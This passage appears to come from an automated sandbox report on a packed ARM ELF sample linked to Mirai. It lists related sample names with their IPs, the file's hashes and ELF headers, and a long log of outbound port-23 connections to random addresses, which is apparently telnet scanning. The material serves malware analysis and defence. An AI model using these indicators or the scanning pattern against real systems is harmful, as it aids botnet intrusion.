                                              • 162.213.35.25
                                              5OGAx17mRN.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              wqZAwYmjjD.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              2EgdpgJdKe.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              RfLJBx6qoS.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              cool.x86.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              SecuriteInfo.com.Linux.Siggen.9999.20159.633.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              top1hbt.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.24
                                              arm.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              x86.elfGet hashmaliciousMiraiBrowse
                                              • 162.213.35.25
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ASN-IBSNAZITZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                              • 79.61.148.81
                                              v5S9SdJgPx.elfGet hashmaliciousMiraiBrowse
                                              • 94.86.18.18
                                              ccbS3mSC4n.elfGet hashmaliciousMiraiBrowse
                                              • 95.227.20.51
                                              fPENePc786.elfGet hashmaliciousMiraiBrowse
                                              • 87.3.78.148
                                              Y6IWvuzItZ.elfGet hashmaliciousMiraiBrowse
                                              • 87.31.156.65
                                              qJY7qgxKYq.elfGet hashmaliciousMiraiBrowse
                                              • 31.199.232.56
                                              WzpinhzvZl.elfGet hashmaliciousMiraiBrowse
                                              • 95.232.180.107
                                              7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
                                              • 94.82.75.0
                                              F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                              • 94.84.106.242
                                              XzViPfICKb.elfGet hashmaliciousMiraiBrowse
                                              • 85.37.216.191
                                              SIFex0dc75.elfGet hashmaliciousMiraiBrowse
                                              • 31.198.254.104
                                              BMXYo1Gliu.elfGet hashmaliciousMiraiBrowse
                                              • 95.239.40.36
                                              SecuriteInfo.com.Linux.Siggen.9999.5057.31485.elfGet hashmaliciousMiraiBrowse
                                              • 62.86.66.170
                                              Q1BPEcSFNH.elfGet hashmaliciousMiraiBrowse
                                              • 79.30.4.248
                                              5OGAx17mRN.elfGet hashmaliciousMiraiBrowse
                                              • 95.252.144.246
                                              L8PCdNq0xs.elfGet hashmaliciousMiraiBrowse
                                              • 79.47.158.88
                                              m1vvw0vLkD.elfGet hashmaliciousMiraiBrowse
                                              • 62.86.66.182
                                              a6YpIDPSBI.elfGet hashmaliciousMiraiBrowse
                                              • 88.38.16.173
                                              gUuUJFJB45.elfGet hashmaliciousUnknownBrowse
                                              • 85.42.179.171
                                              arm.elfGet hashmaliciousMiraiBrowse
                                              • 188.9.63.205
                                              BISPINGISPCitycarrierGermanyDEqJY7qgxKYq.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.231
                                              F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.246
                                              Q1BPEcSFNH.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.229
                                              2EgdpgJdKe.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.228
                                              Pa0exc41sw.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.246
                                              B3dZfZRKxF.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.216
                                              pitNTFQSoH.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.210
                                              J4oa31mXHl.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.230
                                              GRipLsZPVA.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.234
                                              ezhXP3vhPJ.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.129.23
                                              z3hir.x86.elfGet hashmaliciousMiraiBrowse
                                              • 217.30.230.246
                                              meow.x86.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.253
                                              w65tPzdnf0.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.130.57
                                              quPVzfZ7Pd.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.130.62
                                              2BUFiL0WjY.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.54.229
                                              oLX7l6sTtj.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.253
                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.129.55
                                              64CU11Bnfr.elfGet hashmaliciousMiraiBrowse
                                              • 62.91.213.209
                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.154.27
                                              mips.elfGet hashmaliciousMiraiBrowse
                                              • 212.86.129.71
                                              No context
                                              No context
                                              No created / dropped files found
                                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
                                              Entropy (8bit):7.946052708445443
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:7Ueun89KE3.elf
                                              File size:28'600 bytes
                                              MD5:151f3140977754a9befc0fab17a0cdcb
                                              SHA1:f013eef283e3bd33d57d0464db9bfd6559887e8b
                                              SHA256:7d127378f0b4a5a2c3304d74493987da57d1ca7e289c63f4f7fb7c4808d8c3a3
                                              SHA512:ab3c10b127f25535c3464b8ba770f1a3299056fa94e422d382fdcb178b51a34333f21c239cbab75102fbef1cb404b204f149305c0a140055cff0ab08f712e650
                                              SSDEEP:768:2MQ4x0RL12NtI3LTagjxSrAthcnCJr0r4oZiqs3UozF:/x0RR+gTaUxIuhcnC98IzF
                                              TLSH:28D2E1B4A4422E32CA220572E4756ED647871AFE11BE343500641F25FAC3D85FEB9BDB
                                              File Content Preview:.ELF...a..........(..... ...4...........4. ...(......................n...n..............X...X...X...................Q.td............................s.y.UPX!........@...@.......S..........?.E.h;.}...^..........f'....%.",.....n7..Io...K7..l..t.>........d...

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:ARM
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:ARM - ABI
                                              ABI Version:0
                                              Entry Point Address:0xdd20
                                              Flags:0x202
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:0
                                              Section Header Size:40
                                              Number of Section Headers:0
                                              Header String Table Index:0
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80000x80000x6ecf0x6ecf7.94910x5R E0x8000
                                              LOAD0xd580x20d580x20d580x00x00.00000x6RW 0x8000
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 23, 2023 05:14:47.583455086 CET5573823192.168.2.13114.94.64.5
                                              Nov 23, 2023 05:14:47.583478928 CET5573823192.168.2.13162.141.211.5
                                              Nov 23, 2023 05:14:47.583482981 CET5573823192.168.2.1393.199.244.148
                                              Nov 23, 2023 05:14:47.583494902 CET5573823192.168.2.1353.249.28.4
                                              Nov 23, 2023 05:14:47.583497047 CET5573823192.168.2.13252.238.114.160
                                              Nov 23, 2023 05:14:47.583514929 CET5573823192.168.2.13242.181.113.0
                                              Nov 23, 2023 05:14:47.583523989 CET5573823192.168.2.13106.39.193.213
                                              Nov 23, 2023 05:14:47.583523989 CET5573823192.168.2.13192.50.96.130
                                              Nov 23, 2023 05:14:47.583539009 CET5573823192.168.2.13122.197.72.37
                                              Nov 23, 2023 05:14:47.583558083 CET5573823192.168.2.13179.242.135.188
                                              Nov 23, 2023 05:14:47.583559036 CET5573823192.168.2.1359.107.90.4
                                              Nov 23, 2023 05:14:47.583564997 CET5573823192.168.2.1342.226.221.113
                                              Nov 23, 2023 05:14:47.583578110 CET5573823192.168.2.1398.160.247.69
                                              Nov 23, 2023 05:14:47.583583117 CET5573823192.168.2.13203.241.90.77
                                              Nov 23, 2023 05:14:47.583595037 CET5573823192.168.2.13146.224.234.63
                                              Nov 23, 2023 05:14:47.583615065 CET5573823192.168.2.13186.164.105.226
                                              Nov 23, 2023 05:14:47.583621979 CET5573823192.168.2.13147.114.99.192
                                              Nov 23, 2023 05:14:47.583709955 CET5573823192.168.2.13172.69.45.154
                                              Nov 23, 2023 05:14:47.583713055 CET5573823192.168.2.13251.55.15.178
                                              Nov 23, 2023 05:14:47.583753109 CET5573823192.168.2.13207.62.104.84
                                              Nov 23, 2023 05:14:47.583754063 CET5573823192.168.2.13168.34.97.135
                                              Nov 23, 2023 05:14:47.583758116 CET5573823192.168.2.13245.119.133.202
                                              Nov 23, 2023 05:14:47.583761930 CET5573823192.168.2.13106.179.194.201
                                              Nov 23, 2023 05:14:47.583786964 CET5573823192.168.2.13193.181.25.130
                                              Nov 23, 2023 05:14:47.583794117 CET5573823192.168.2.13192.216.76.220
                                              Nov 23, 2023 05:14:47.583800077 CET5573823192.168.2.13193.62.227.226
                                              Nov 23, 2023 05:14:47.583811998 CET5573823192.168.2.13190.156.36.103
                                              Nov 23, 2023 05:14:47.583820105 CET5573823192.168.2.1395.75.251.164
                                              Nov 23, 2023 05:14:47.583838940 CET5573823192.168.2.13113.199.4.118
                                              Nov 23, 2023 05:14:47.583864927 CET5573823192.168.2.13168.128.35.75
                                              Nov 23, 2023 05:14:47.583865881 CET5573823192.168.2.1386.0.51.238
                                              Nov 23, 2023 05:14:47.583872080 CET5573823192.168.2.13120.113.107.197
                                              Nov 23, 2023 05:14:47.583872080 CET5573823192.168.2.135.110.72.29
                                              Nov 23, 2023 05:14:47.583890915 CET5573823192.168.2.13187.204.148.225
                                              Nov 23, 2023 05:14:47.583890915 CET5573823192.168.2.139.89.253.171
                                              Nov 23, 2023 05:14:47.583924055 CET5573823192.168.2.1324.255.105.201
                                              Nov 23, 2023 05:14:47.583924055 CET5573823192.168.2.139.155.9.15
                                              Nov 23, 2023 05:14:47.583925009 CET5573823192.168.2.132.128.9.145
                                              Nov 23, 2023 05:14:47.583940029 CET5573823192.168.2.1386.252.180.89
                                              Nov 23, 2023 05:14:47.583942890 CET5573823192.168.2.13197.131.96.98
                                              Nov 23, 2023 05:14:47.583956003 CET5573823192.168.2.1375.118.133.27
                                              Nov 23, 2023 05:14:47.583959103 CET5573823192.168.2.1336.227.243.200
                                              Nov 23, 2023 05:14:47.583972931 CET5573823192.168.2.13161.145.208.118
                                              Nov 23, 2023 05:14:47.583977938 CET5573823192.168.2.13170.202.109.214
                                              Nov 23, 2023 05:14:47.583981991 CET5573823192.168.2.13185.182.239.222
                                              Nov 23, 2023 05:14:47.583983898 CET5573823192.168.2.13124.20.34.96
                                              Nov 23, 2023 05:14:47.583995104 CET5573823192.168.2.13119.242.12.236
                                              Nov 23, 2023 05:14:47.583998919 CET5573823192.168.2.13106.59.248.81
                                              Nov 23, 2023 05:14:47.584018946 CET5573823192.168.2.13122.88.54.80
                                              Nov 23, 2023 05:14:47.584034920 CET5573823192.168.2.13172.76.178.15
                                              Nov 23, 2023 05:14:47.584054947 CET5573823192.168.2.1339.182.21.17
                                              Nov 23, 2023 05:14:47.584055901 CET5573823192.168.2.13106.224.70.50
                                              Nov 23, 2023 05:14:47.584059954 CET5573823192.168.2.13250.175.123.219
                                              Nov 23, 2023 05:14:47.584059954 CET5573823192.168.2.1363.229.216.72
                                              Nov 23, 2023 05:14:47.584070921 CET5573823192.168.2.13102.199.245.240
                                              Nov 23, 2023 05:14:47.584083080 CET5573823192.168.2.1347.64.12.152
                                              Nov 23, 2023 05:14:47.584089994 CET5573823192.168.2.13208.207.1.224
                                              Nov 23, 2023 05:14:47.584099054 CET5573823192.168.2.13204.121.124.151
                                              Nov 23, 2023 05:14:47.584120989 CET5573823192.168.2.13216.103.108.38
                                              Nov 23, 2023 05:14:47.584126949 CET5573823192.168.2.1391.67.242.78
                                              Nov 23, 2023 05:14:47.584148884 CET5573823192.168.2.1371.63.198.24
                                              Nov 23, 2023 05:14:47.584162951 CET5573823192.168.2.1390.186.37.89
                                              Nov 23, 2023 05:14:47.584167004 CET5573823192.168.2.1367.202.110.220
                                              Nov 23, 2023 05:14:47.584171057 CET5573823192.168.2.1340.151.62.163
                                              Nov 23, 2023 05:14:47.584177971 CET5573823192.168.2.13166.151.171.92
                                              Nov 23, 2023 05:14:47.584219933 CET5573823192.168.2.1344.173.1.52
                                              Nov 23, 2023 05:14:47.584222078 CET5573823192.168.2.13222.58.136.225
                                              Nov 23, 2023 05:14:47.584233046 CET5573823192.168.2.13254.167.233.252
                                              Nov 23, 2023 05:14:47.584244013 CET5573823192.168.2.1387.231.35.73
                                              Nov 23, 2023 05:14:47.584247112 CET5573823192.168.2.13161.81.44.253
                                              Nov 23, 2023 05:14:47.584266901 CET5573823192.168.2.1342.23.207.169
                                              Nov 23, 2023 05:14:47.584266901 CET5573823192.168.2.13208.187.100.36
                                              Nov 23, 2023 05:14:47.584281921 CET5573823192.168.2.1316.189.200.8
                                              Nov 23, 2023 05:14:47.584295034 CET5573823192.168.2.132.78.255.136
                                              Nov 23, 2023 05:14:47.584295988 CET5573823192.168.2.13198.133.226.96
                                              Nov 23, 2023 05:14:47.584302902 CET5573823192.168.2.13121.3.247.85
                                              Nov 23, 2023 05:14:47.584322929 CET5573823192.168.2.1367.65.118.199
                                              Nov 23, 2023 05:14:47.584323883 CET5573823192.168.2.1344.99.159.91
                                              Nov 23, 2023 05:14:47.584326982 CET5573823192.168.2.1345.165.109.191
                                              Nov 23, 2023 05:14:47.584338903 CET5573823192.168.2.13249.151.246.224
                                              Nov 23, 2023 05:14:47.584353924 CET5573823192.168.2.1375.30.17.116
                                              Nov 23, 2023 05:14:47.584357977 CET5573823192.168.2.1390.28.156.18
                                              Nov 23, 2023 05:14:47.584361076 CET5573823192.168.2.13122.115.64.46
                                              Nov 23, 2023 05:14:47.584373951 CET5573823192.168.2.13121.58.18.146
                                              Nov 23, 2023 05:14:47.584373951 CET5573823192.168.2.13212.154.219.7
                                              Nov 23, 2023 05:14:47.584392071 CET5573823192.168.2.13110.26.119.187
                                              Nov 23, 2023 05:14:47.584392071 CET5573823192.168.2.1366.185.229.139
                                              Nov 23, 2023 05:14:47.584393978 CET5573823192.168.2.1388.179.223.65
                                              Nov 23, 2023 05:14:47.584397078 CET5573823192.168.2.13125.12.124.225
                                              Nov 23, 2023 05:14:47.584404945 CET5573823192.168.2.13179.255.30.220
                                              Nov 23, 2023 05:14:47.584414959 CET5573823192.168.2.1366.1.126.169
                                              Nov 23, 2023 05:14:47.584424019 CET5573823192.168.2.13108.221.225.236
                                              Nov 23, 2023 05:14:47.584430933 CET5573823192.168.2.1370.156.86.29
                                              Nov 23, 2023 05:14:47.584435940 CET5573823192.168.2.1383.43.205.56
                                              Nov 23, 2023 05:14:47.584446907 CET5573823192.168.2.13161.117.225.65
                                              Nov 23, 2023 05:14:47.584461927 CET5573823192.168.2.13219.125.185.167
                                              Nov 23, 2023 05:14:47.584465981 CET5573823192.168.2.13202.11.143.199
                                              Nov 23, 2023 05:14:47.584479094 CET5573823192.168.2.13175.172.40.156
                                              Nov 23, 2023 05:14:47.584486961 CET5573823192.168.2.131.236.141.144
                                              Nov 23, 2023 05:14:47.584603071 CET5573823192.168.2.131.196.146.69
                                              Nov 23, 2023 05:14:47.584603071 CET5573823192.168.2.1385.129.73.87
                                              Nov 23, 2023 05:14:47.584603071 CET5573823192.168.2.13187.250.240.232
                                              Nov 23, 2023 05:14:47.584606886 CET5573823192.168.2.13201.126.78.149
                                              Nov 23, 2023 05:14:47.584620953 CET5573823192.168.2.1317.172.110.77
                                              Nov 23, 2023 05:14:47.584638119 CET5573823192.168.2.1332.152.235.23
                                              Nov 23, 2023 05:14:47.584641933 CET5573823192.168.2.13133.18.96.252
                                              Nov 23, 2023 05:14:47.584641933 CET5573823192.168.2.13157.31.89.122
                                              Nov 23, 2023 05:14:47.584650040 CET5573823192.168.2.13133.106.120.25
                                              Nov 23, 2023 05:14:47.584661961 CET5573823192.168.2.13149.51.217.229
                                              Nov 23, 2023 05:14:47.584666967 CET5573823192.168.2.13196.253.251.95
                                              Nov 23, 2023 05:14:47.584673882 CET5573823192.168.2.13171.188.184.237
                                              Nov 23, 2023 05:14:47.584677935 CET5573823192.168.2.1371.114.110.132
                                              Nov 23, 2023 05:14:47.584688902 CET5573823192.168.2.13179.117.254.32
                                              Nov 23, 2023 05:14:47.584692955 CET5573823192.168.2.132.239.248.170
                                              Nov 23, 2023 05:14:47.584697008 CET5573823192.168.2.13248.126.189.116
                                              Nov 23, 2023 05:14:47.584700108 CET5573823192.168.2.1393.86.189.52
                                              Nov 23, 2023 05:14:47.584702969 CET5573823192.168.2.13122.95.220.126
                                              Nov 23, 2023 05:14:47.584702969 CET5573823192.168.2.13187.161.159.168
                                              Nov 23, 2023 05:14:47.584754944 CET5573823192.168.2.13143.242.57.152
                                              Nov 23, 2023 05:14:47.584754944 CET5573823192.168.2.13157.53.66.203
                                              Nov 23, 2023 05:14:47.584772110 CET5573823192.168.2.13193.54.150.224
                                              Nov 23, 2023 05:14:47.584774971 CET5573823192.168.2.13176.79.251.138
                                              Nov 23, 2023 05:14:47.584778070 CET5573823192.168.2.13185.39.15.102
                                              Nov 23, 2023 05:14:47.584778070 CET5573823192.168.2.13106.34.224.29
                                              Nov 23, 2023 05:14:47.584800959 CET5573823192.168.2.1313.249.169.255
                                              Nov 23, 2023 05:14:47.584825993 CET5573823192.168.2.13160.84.186.38
                                              Nov 23, 2023 05:14:47.584829092 CET5573823192.168.2.1339.154.236.87
                                              Nov 23, 2023 05:14:47.584881067 CET5573823192.168.2.13155.250.5.166
                                              Nov 23, 2023 05:14:47.584889889 CET5573823192.168.2.13133.200.51.79
                                              Nov 23, 2023 05:14:47.584894896 CET5573823192.168.2.13111.56.78.15
                                              Nov 23, 2023 05:14:47.584907055 CET5573823192.168.2.13163.252.233.101
                                              Nov 23, 2023 05:14:47.584907055 CET5573823192.168.2.1388.61.120.132
                                              Nov 23, 2023 05:14:47.584923029 CET5573823192.168.2.1378.58.180.129
                                              Nov 23, 2023 05:14:47.584923983 CET5573823192.168.2.13184.108.52.97
                                              Nov 23, 2023 05:14:47.584939957 CET5573823192.168.2.1386.199.134.156
                                              Nov 23, 2023 05:14:47.584956884 CET5573823192.168.2.13154.141.22.98
                                              Nov 23, 2023 05:14:47.584978104 CET5573823192.168.2.13121.78.43.117
                                              Nov 23, 2023 05:14:47.584978104 CET5573823192.168.2.13205.143.124.122
                                              Nov 23, 2023 05:14:47.584978104 CET5573823192.168.2.13184.134.156.27
                                              Nov 23, 2023 05:14:47.585009098 CET5573823192.168.2.13194.90.228.235
                                              Nov 23, 2023 05:14:47.585011959 CET5573823192.168.2.1346.223.173.146
                                              Nov 23, 2023 05:14:47.585031033 CET5573823192.168.2.1386.42.222.155
                                              Nov 23, 2023 05:14:47.585031033 CET5573823192.168.2.1339.65.70.13
                                              Nov 23, 2023 05:14:47.585042000 CET5573823192.168.2.13247.54.13.136
                                              Nov 23, 2023 05:14:47.585055113 CET5573823192.168.2.13135.212.223.203
                                              Nov 23, 2023 05:14:47.585072994 CET5573823192.168.2.13248.182.183.148
                                              Nov 23, 2023 05:14:47.585072994 CET5573823192.168.2.13110.190.188.172
                                              Nov 23, 2023 05:14:47.585074902 CET5573823192.168.2.1336.15.230.208
                                              Nov 23, 2023 05:14:47.585078955 CET5573823192.168.2.13155.249.233.241
                                              Nov 23, 2023 05:14:47.585098982 CET5573823192.168.2.1327.137.33.238
                                              Nov 23, 2023 05:14:47.585099936 CET5573823192.168.2.13178.92.239.147
                                              Nov 23, 2023 05:14:47.585107088 CET5573823192.168.2.13154.109.176.243
                                              Nov 23, 2023 05:14:47.585114956 CET5573823192.168.2.13209.245.56.149
                                              Nov 23, 2023 05:14:47.585124969 CET5573823192.168.2.1348.191.128.217
                                              Nov 23, 2023 05:14:47.585125923 CET5573823192.168.2.13114.74.5.98
                                              Nov 23, 2023 05:14:47.585129976 CET5573823192.168.2.13198.240.36.202
                                              Nov 23, 2023 05:14:47.585136890 CET5573823192.168.2.135.69.73.238
                                              Nov 23, 2023 05:14:47.585139990 CET5573823192.168.2.13198.31.140.83
                                              Nov 23, 2023 05:14:47.585145950 CET5573823192.168.2.13178.6.195.81
                                              Nov 23, 2023 05:14:47.585155964 CET5573823192.168.2.13167.231.96.80
                                              Nov 23, 2023 05:14:47.585164070 CET5573823192.168.2.13145.254.191.220
                                              Nov 23, 2023 05:14:47.585180998 CET5573823192.168.2.13250.7.75.229
                                              Nov 23, 2023 05:14:47.585180998 CET5573823192.168.2.1318.108.210.87
                                              Nov 23, 2023 05:14:47.585180998 CET5573823192.168.2.13250.196.122.84
                                              Nov 23, 2023 05:14:47.585211039 CET5573823192.168.2.13218.193.34.198
                                              Nov 23, 2023 05:14:47.585221052 CET5573823192.168.2.1379.137.167.176
                                              Nov 23, 2023 05:14:47.585226059 CET5573823192.168.2.13253.129.11.200
                                              Nov 23, 2023 05:14:47.585247040 CET5573823192.168.2.13123.98.41.148
                                              Nov 23, 2023 05:14:47.585306883 CET5573823192.168.2.13141.234.18.165
                                              Nov 23, 2023 05:14:47.585315943 CET5573823192.168.2.13184.88.208.54
                                              Nov 23, 2023 05:14:47.585318089 CET5573823192.168.2.138.16.124.118
                                              Nov 23, 2023 05:14:47.585319042 CET5573823192.168.2.1383.42.62.197
                                              Nov 23, 2023 05:14:47.585351944 CET5573823192.168.2.13216.98.250.81
                                              Nov 23, 2023 05:14:47.585366964 CET5573823192.168.2.13203.85.156.170
                                              Nov 23, 2023 05:14:47.585366964 CET5573823192.168.2.13185.185.88.224
                                              Nov 23, 2023 05:14:47.585369110 CET5573823192.168.2.13123.212.6.108
                                              Nov 23, 2023 05:14:47.585371017 CET5573823192.168.2.1381.187.247.95
                                              Nov 23, 2023 05:14:47.585381031 CET5573823192.168.2.1392.105.84.147
                                              Nov 23, 2023 05:14:47.585391045 CET5573823192.168.2.13198.252.217.15
                                              Nov 23, 2023 05:14:47.585391045 CET5573823192.168.2.1391.130.45.132
                                              Nov 23, 2023 05:14:47.585391045 CET5573823192.168.2.1354.111.149.29
                                              Nov 23, 2023 05:14:47.585438013 CET5573823192.168.2.13154.202.194.158
                                              Nov 23, 2023 05:14:47.585452080 CET5573823192.168.2.1360.223.220.44
                                              Nov 23, 2023 05:14:47.585452080 CET5573823192.168.2.13122.58.166.104
                                              Nov 23, 2023 05:14:47.585453033 CET5573823192.168.2.1372.101.155.202
                                              Nov 23, 2023 05:14:47.585453987 CET5573823192.168.2.1384.138.240.4
                                              Nov 23, 2023 05:14:47.585453033 CET5573823192.168.2.13218.56.172.188
                                              Nov 23, 2023 05:14:47.585453987 CET5573823192.168.2.13203.235.242.57
                                              Nov 23, 2023 05:14:47.585453033 CET5573823192.168.2.1376.202.168.32
                                              Nov 23, 2023 05:14:47.585455894 CET5573823192.168.2.1378.211.125.182
                                              Nov 23, 2023 05:14:47.585467100 CET5573823192.168.2.13128.244.111.124
                                              Nov 23, 2023 05:14:47.585469007 CET5573823192.168.2.1385.151.35.121
                                              Nov 23, 2023 05:14:47.585517883 CET5573823192.168.2.13151.21.166.253
                                              Nov 23, 2023 05:14:47.585525990 CET5573823192.168.2.13249.217.124.27
                                              Nov 23, 2023 05:14:47.585526943 CET5573823192.168.2.13193.16.141.19
                                              Nov 23, 2023 05:14:47.585536957 CET5573823192.168.2.13161.173.22.235
                                              Nov 23, 2023 05:14:47.585536957 CET5573823192.168.2.1373.203.166.119
                                              Nov 23, 2023 05:14:47.585539103 CET5573823192.168.2.1385.157.43.143
                                              Nov 23, 2023 05:14:47.585541964 CET5573823192.168.2.13252.148.128.238
                                              Nov 23, 2023 05:14:47.585541964 CET5573823192.168.2.1354.126.93.218
                                              Nov 23, 2023 05:14:47.585541964 CET5573823192.168.2.139.76.140.37
                                              Nov 23, 2023 05:14:47.585545063 CET5573823192.168.2.1337.117.204.248
                                              Nov 23, 2023 05:14:47.585545063 CET5573823192.168.2.13197.202.79.49
                                              Nov 23, 2023 05:14:47.585545063 CET5573823192.168.2.1360.28.167.255
                                              Nov 23, 2023 05:14:47.585570097 CET5573823192.168.2.13155.176.230.164
                                              Nov 23, 2023 05:14:47.585570097 CET5573823192.168.2.1357.132.53.176
                                              Nov 23, 2023 05:14:47.585570097 CET5573823192.168.2.13244.252.174.181
                                              Nov 23, 2023 05:14:47.585578918 CET5573823192.168.2.13251.45.210.90
                                              Nov 23, 2023 05:14:47.585580111 CET5573823192.168.2.13163.233.128.8
                                              Nov 23, 2023 05:14:47.585592031 CET5573823192.168.2.13249.200.128.132
                                              Nov 23, 2023 05:14:47.585592031 CET5573823192.168.2.13141.219.147.173
                                              Nov 23, 2023 05:14:47.585592031 CET5573823192.168.2.13157.254.42.210
                                              Nov 23, 2023 05:14:47.585592985 CET5573823192.168.2.1359.47.218.65
                                              Nov 23, 2023 05:14:47.585592031 CET5573823192.168.2.13117.67.23.247
                                              Nov 23, 2023 05:14:47.585596085 CET5573823192.168.2.13141.148.234.156
                                              Nov 23, 2023 05:14:47.585607052 CET5573823192.168.2.13189.133.20.148
                                              Nov 23, 2023 05:14:47.585612059 CET5573823192.168.2.13204.13.26.237
                                              Nov 23, 2023 05:14:47.585612059 CET5573823192.168.2.1377.194.136.216
                                              Nov 23, 2023 05:14:47.585613966 CET5573823192.168.2.1363.18.55.215
                                              Nov 23, 2023 05:14:47.585612059 CET5573823192.168.2.1331.117.191.35
                                              Nov 23, 2023 05:14:47.585616112 CET5573823192.168.2.13184.236.190.107
                                              Nov 23, 2023 05:14:47.585618019 CET5573823192.168.2.13219.89.8.199
                                              Nov 23, 2023 05:14:47.585622072 CET5573823192.168.2.13152.65.230.133
                                              Nov 23, 2023 05:14:47.585670948 CET5573823192.168.2.13104.143.149.182
                                              Nov 23, 2023 05:14:47.585673094 CET5573823192.168.2.1358.139.41.218
                                              Nov 23, 2023 05:14:47.585673094 CET5573823192.168.2.1361.8.133.45
                                              Nov 23, 2023 05:14:47.585675001 CET5573823192.168.2.1340.36.5.165
                                              Nov 23, 2023 05:14:47.585675001 CET5573823192.168.2.1337.58.230.223
                                              Nov 23, 2023 05:14:47.585685015 CET5573823192.168.2.1319.213.76.186
                                              Nov 23, 2023 05:14:47.585690975 CET5573823192.168.2.13248.121.189.97
                                              Nov 23, 2023 05:14:47.585690975 CET5573823192.168.2.13159.11.154.55
                                              Nov 23, 2023 05:14:47.585692883 CET5573823192.168.2.13155.211.221.36
                                              Nov 23, 2023 05:14:47.585699081 CET5573823192.168.2.13161.103.103.156
                                              Nov 23, 2023 05:14:47.585700035 CET5573823192.168.2.13178.91.205.246
                                              Nov 23, 2023 05:14:47.585700035 CET5573823192.168.2.1332.178.64.255
                                              Nov 23, 2023 05:14:47.585715055 CET5573823192.168.2.13164.121.178.86
                                              Nov 23, 2023 05:14:47.585715055 CET5573823192.168.2.13157.197.50.121
                                              Nov 23, 2023 05:14:47.585715055 CET5573823192.168.2.13196.121.140.211
                                              Nov 23, 2023 05:14:47.585731983 CET5573823192.168.2.13160.123.169.117
                                              Nov 23, 2023 05:14:47.585736036 CET5573823192.168.2.13253.206.150.74
                                              Nov 23, 2023 05:14:47.585736036 CET5573823192.168.2.13156.46.72.156
                                              Nov 23, 2023 05:14:47.585740089 CET5573823192.168.2.1312.48.36.210
                                              Nov 23, 2023 05:14:47.585746050 CET5573823192.168.2.1357.211.121.156
                                              Nov 23, 2023 05:14:47.585747004 CET5573823192.168.2.13172.177.58.29
                                              Nov 23, 2023 05:14:47.585747004 CET5573823192.168.2.13133.14.61.45
                                              Nov 23, 2023 05:14:47.585747957 CET5573823192.168.2.13142.236.200.216
                                              Nov 23, 2023 05:14:47.585747957 CET5573823192.168.2.13126.252.168.81
                                              Nov 23, 2023 05:14:47.585748911 CET5573823192.168.2.13150.8.165.97
                                              Nov 23, 2023 05:14:47.585748911 CET5573823192.168.2.13157.43.209.213
                                              Nov 23, 2023 05:14:47.585793972 CET5573823192.168.2.132.141.150.13
                                              Nov 23, 2023 05:14:47.585793972 CET5573823192.168.2.13186.103.157.181
                                              Nov 23, 2023 05:14:47.585793972 CET5573823192.168.2.1388.251.183.95
                                              Nov 23, 2023 05:14:47.585797071 CET5573823192.168.2.1393.0.136.208
                                              Nov 23, 2023 05:14:47.585799932 CET5573823192.168.2.1324.209.73.125
                                              Nov 23, 2023 05:14:47.585799932 CET5573823192.168.2.13248.47.158.82
                                              Nov 23, 2023 05:14:47.585799932 CET5573823192.168.2.13199.68.170.247
                                              Nov 23, 2023 05:14:47.585802078 CET5573823192.168.2.13145.179.188.232
                                              Nov 23, 2023 05:14:47.585804939 CET5573823192.168.2.1363.163.217.211
                                              Nov 23, 2023 05:14:47.585804939 CET5573823192.168.2.13200.71.139.42
                                              Nov 23, 2023 05:14:47.585808039 CET5573823192.168.2.1380.89.57.219
                                              Nov 23, 2023 05:14:47.585808039 CET5573823192.168.2.1368.164.174.232
                                              Nov 23, 2023 05:14:47.585815907 CET5573823192.168.2.13172.253.18.98
                                              Nov 23, 2023 05:14:47.585855007 CET5573823192.168.2.1359.50.76.204
                                              Nov 23, 2023 05:14:47.585865021 CET5573823192.168.2.13247.21.61.127
                                              Nov 23, 2023 05:14:47.585865021 CET5573823192.168.2.1335.110.110.235
                                              Nov 23, 2023 05:14:47.585867882 CET5573823192.168.2.1379.115.229.123
                                              Nov 23, 2023 05:14:47.585869074 CET5573823192.168.2.1338.157.220.37
                                              Nov 23, 2023 05:14:47.585870981 CET5573823192.168.2.13124.131.68.26
                                              Nov 23, 2023 05:14:47.585870981 CET5573823192.168.2.13162.12.34.84
                                              Nov 23, 2023 05:14:47.585905075 CET5573823192.168.2.13171.138.165.188
